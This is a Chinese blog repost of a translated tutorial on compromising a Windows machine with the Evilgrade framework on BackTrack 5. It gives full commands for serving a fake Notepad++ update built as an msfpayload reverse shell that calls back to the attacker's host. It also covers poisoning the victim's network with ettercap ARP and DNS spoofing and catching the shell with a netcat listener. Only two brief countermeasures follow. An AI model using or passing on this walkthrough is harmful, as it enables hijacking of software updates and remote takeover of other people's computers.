【翻译】在backtrack5上用Evilgrade工具15步**windows
首先声明下,这是我转转自红盟的一篇文章,原文链接在这里:http://www.cnhonkerarmy.com/thread-78296-1-1.html
这篇文章是我无意中看见的evligrade的一个利用教程,由于是英文的所以翻译给大家看看!感觉对大家的认识和提高都有很多的作用,其实漏洞无处不在!开拓我们的思维,才是关键!
好了,废话不多说!
---------------------------------------------------
此文摘自:http://vishnuvalentino.com/compu ... 2-0-on-backtrack-5/
作者:Vishnu Valentino
翻译:L.N.
题目:在backtrack5上用Evilgrade工具15步**windows
文章类型:辅导类
难度:中高级
evilgrade简介:
evilgrade是一个模块化的框架结构,使用者可以利用脆弱的软件的升级更新机制,来欺骗用户安装自己注入的其他程序(***、病毒)。它提供了代理和默认快速配置,还有web服务和dns服务模块,可以很容易的更新设置,并且还可以自动配置新的代理!
来自:http://www.infobytesec.com
使用工具:
1. Evilgrade
2. Backtrack 5
步骤:
1.解压evilgrade然后运行它用下面的命令
- tar xvfz isr-evilgrade-2.0.0.tar.gz
- cd isr-evilgrade-2.0.0.tar.gz/
- ./evilgrade
复制代码
如果你在使用evilgrade的时候出现了错误,你可以参考http://vishnuvalentino.com/tips- ... backtrack-5-solved/这篇文章
下面显示的这个图片是你正确运行时的样子
2.下一步你需要去确定一个应用的目标程序,因为evilgrade将创建一个假的更新注入到目标电脑。使用下面的命令查看可以支持应用的模块。
- evilgrade>show modules
复制代码
(命令是show modules,不要evilgrade>也输入进去了,这个便是当前的目录)
- List of modules:
- ===============
- allmynotes
- amsn
- appleupdate
- apptapp
- apt
- atube
- autoit3
- bbappworld
- blackberry
- bsplayer
- ccleaner
- clamwin
- cpan
- cygwin
- dap
- divxsuite
- express_talk
- fcleaner
- filezilla
- flashget
- flip4mac
- freerip
- getjar
- gom
- googleanalytics
- growl
- isopen
- istat
- itunes
- jet
- jetphoto
- miranda
- mirc
- nokia
- nokiasoftware
- notepadplus
- openoffice
- opera
- orbit
- osx
- paintnet
- panda_antirootkit
- photoscape
- quicktime
- skype
- sparkle
- speedbit
- sunbelt
- sunjava
- superantispyware
- teamviewer
- techtracker
- trillian
- ubertwitter
- vidbox
- virtualbox
- vmware
- winamp
- winscp
- winupdate
- winzip
- yahoomsn
- - 63 modules available.
复制代码
在这篇辅导文章中,我将使用的目标程序是notepad plus,因此当管理员不加思索的升级这个应用程序的时候,他讲掉进我的陷阱里面。使用这个模块,运行以下命令:
- evilgrade>configure notepadplus
复制代码
3.查看选项,你可以使用show options这个命令
在上面的图片中,virtualhost是当管理员升级他的notepad plus时,就会打开这个url连接:notepad-plus.sourceforge.net。下面我们将使用到这个连接。
4.接下来我们设置一个代理。我们配置一个代理用msfpayload创建一个shell_reverse_tcp
- evilgrade(notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'
复制代码
解释:
/pentest/exploits/framework3/msfpayload –> 我们将加载这个msfpayload
windows/shell_reverse_tcp –> 当成功的时候我们就可以反弹一个shell回本地
LHOST –> localhost 你backtrack5的ip地址 / ***者的ip地址.
LPORT –> 填一个端口(用于监听) (相关的说明可以看http://www.infobytesec.com/down/isr-evilgrade-Readme.txt)
5.下一步是我们打开evilgrade服务。确保你的80端口是打开的
6.完成了evilgrade得设置过后,我们还需要配置中间人***用ettercap,然后当当管理员升级notpad plus时就会直接连接evilgrade服务。第一步是你需要配置etter.dns
- pico /usr/share/ettercap/etter.dns
复制代码
notepad-plus.sourceforge.net –> 这个地址是我们在第三步得到的
7.接下来我们要用到ettercap
“ettercap是什么见http://ettercap.sourceforge.net/”
运行ettercap,打开新的terminal(ctrl+alt+t)运行下面的命令
- ettercap -G
复制代码
Click Sniff –> Unified sniffing –> 选着你的网卡,在这儿我用eth0.
8.下一步我们需要使用dns_spoof插件,这个插件用于接收目标机器对evilgrade服务的请求。点击 Plugins –> Manage the plugins –> 双击 dns_spoof
9.下一步是扫描主机,这部是我们去决定一个目标,点击Hosts –> Scan for
10.下面是我们网络中得所有主机,我们需要建议一个目标
11.我们还需要去完成中间者***去拦截网络中得数据,点击 Mitm –> Arp poisoning –> 点击 "Sniff remote connection".
12.如果上面的每一步都设置正确,就运行ettercap开始嗅探start sniffing
13.接下来我们用nc(netcat)去监听端口1234(这个端口就是我们上面设置的那个)
nc是什么我就不多说了不知道的见:From : http://netcat.sourceforge.net/
新打开一个terminal(ctrl+alt+t)并且运行命令
- nc -l -v -p 1234
复制代码
14.当管理员打开notepad plus时就会被要求升级更新,如下面的图,如果管理员点击yes,就成功了
15.我们的nc就会有东西回显了,因为当管理员点击yes升级完成的时候,我们反弹的shell就成功了
应对方法:
1.直接到官方网站下载最新版本的程序
2.保持反病毒程序是最新的
希望对你有帮助
转载于:https://blog.51cto.com/3135888/1193926
【翻译】在backtrack5上用Evilgrade工具15步**windows相关推荐
- qt 增加的翻译没有作用上_Qt语言翻译工具的使用 及 QT-Linguist国际化的简单实现...
通过使用Qt Linguist工具时,可以有两种方式进行下一步操作(Windows操作系统).首先说明第一种,在一个软件系统中存在*.pro的工程文件,因而我们可以借此通过采用命令行的形式生成最终所需 ...
- 图片翻译文字怎么弄,分享几个怎么翻译图片上的文字工具
我们平时在工作或学习中,经常要面对很多陌生的文档和图片,而为了工作能正常进行下去,每次都是将不懂的词汇一个个手动去搜索,但是这样的方法效率真的很低,况且有时候搜索个别不懂的词语并不能完全的理解全文.所 ...
- mac上编码转换工具_25个用于高效编码的Mac工具
mac上编码转换工具 by freeCodeCamp 通过freeCodeCamp 25个用于高效编码的Mac工具 (25 Mac Tools for Productive Coding) 1.现代浏 ...
- CENTOS上的网络安全工具(十四)搬到Docker上(2)?
既然说要搬到Docker上,那么肯定是要把咱日常习惯用的那些东西都往docker上堆一堆看的.我最先考虑的居然是SSH,乃至于到现在我都不知道我为什么第一个想到的是SSH--因为对虚拟机来说,首先考虑 ...
- 我的 Windows Vista 上安装的工具
1.虚拟光驱:如果说Daemon Tools最强最好用的虚拟光驱软件一点也不为过,看看各大下载站点对它的等级评价以及说明就知道了.它安装后安装完成后只有右下角任务栏的一个小图标,系统资源占用率极小. ...
- 日常英语---五、英语句子翻译和读的选择什么工具好
日常英语---五.英语句子翻译和读的选择什么工具好 一.总结 一句话总结:英语翻译用有道+google啊,找相似句啊,读的话要google 翻译:有道+google 找相似句 读:google 1.后 ...
- 【翻译】25个浏览器开发工具的秘密
原文:http://www.andismith.com/blog/2011/11/25-dev-tool-secrets/ 作者:Andi Smith 翻译:25个浏览器开发工具的秘密 开发 过去几年 ...
- CENTOS上的网络安全工具(十六)容器特色的Linux操作
这一篇,我们继续在Docker上折腾.之前我们已经展示了如何在容器上搭建安全产品的部署环境,这里我们需要更进一步,讨论如何在容器上搭建开发与调试环境.这是学习安全产品并且自己构建安全产品的基础步骤. ...
- 在pc端上操作手机工具分享
在pc端上操作手机工具分享 今天要跟大家分享的工具名字叫scrcpy(来源于GitHub) scrcpy可以通过usb或是(Tcp/IP)来连接安卓设备,并且不需要root权限,程序支持GNU/Lin ...
最新文章
- 安装python及web.py
- MySQL 查询重复数据,删除重复数据保留id最小的一条作为唯一数据
- 深度前沿:对话管理模型研究最新进展
- docker-compose(入门,与docker的区别)
- Magento教程 18:Magento功能导览(2) 展示商品
- 并发重复请求,这才是优雅的处理方式!
- Navicat操作SQL server 2008R2文件.bak文件还原
- java对象占用内存的说法_JAVA 中关于对象成员占用内存的说法哪个正确 (3.0分)_学小易找答案...
- 程序异常自动生成DMP文件
- python与建筑结构设计_29个常见的结构设计问题盘点
- Angularjs的http请求
- layui table 渲染动态列及列数据
- Nginx-浅析(转)
- 【密码学】C 语言实现 RSA 模幂运算
- android点击按钮静音,android 实现一键静音功能
- android手机 垃圾箱,Dumpster Pro「回收站」v3.6.386 for Android 直装解锁高级版 —— 一款不错的 Android 垃圾箱 / 回收站应用...
- mysql还原.bak文件
- Aegisub精细处理字幕文件
- 函数周期表丨EXCEPT
- IDL学习:语法基础-变量